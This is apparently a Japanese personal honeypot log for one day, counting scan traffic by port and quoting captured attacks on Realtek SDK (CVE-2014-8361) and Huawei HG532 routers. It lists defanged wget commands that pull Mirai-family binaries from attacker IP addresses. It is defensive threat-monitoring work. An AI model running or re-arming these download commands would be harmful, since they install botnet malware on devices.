ハニーポット簡易分析(12日目:8/19)
週次分析のように詳細ではなく、個人メモ的な簡易分析になってきました。
何か変化があるかなーと思いつつ、簡易分析してみます。
Honeytrap 分析結果
8/19 7033件( 0Byte以上 4625件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,445 | 31.24% | 調査行為 |
3389 | RDP | 640 | 13.84% | 調査行為 |
22 | SSH | 274 | 5.92% | 調査行為 |
1433 | Microsoft SQL Server | 56 | 1.21% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 47 | 1.02% | /conf へのアクセス |
52869 | D-Link, Realtek SDK | 43 | 0.93% | マルウェアダウンロード |
8080 | PROXY | 43 | 0.93% | 調査行為 |
88 | Kerberos | 35 | 0.76% | 調査行為 |
2123 | ? | 34 | 0.74% | 調査行為 |
3388 | RDP | 23 | 0.50% | 調査行為 |
特に大きく変化した宛先ポートはありませんでした。
<マルウェアダウンロード>
① CVE-2014-8361の脆弱性を狙った攻撃
→ Mirai系のマルウェア
POST /picsdesc.xml HTTP/1.1
・wget hxxp://159[.]5[.]232[.]56/xd.mips
・wget hxxp://107[.]191[.]99[.]41/elf.mips
・wget hxxp://80[.]211[.]67[.]245/mips
②Huawei Router HG532の脆弱性を狙った攻撃
→ダウンロード不可。一度アクセスすると拒否されることもあることからマルウェアのダウンロードではなく、成功したIPを収集しているだけの可能性もあると推測
POST /ctrlt/DeviceUpgrade_1
・wget 209[.]141[.]33[.]86
・wget 209[.]141[.]42[.]3
③CVE-2014-8361の脆弱性を狙った攻撃
→ Mirai系のマルウェア
POST /wanipcn.xml HTTP/1.1
・wget hxxp://80[.]211[.]67[.]245/mips
こちらも大きな変化なしです。以上、簡易分析となります。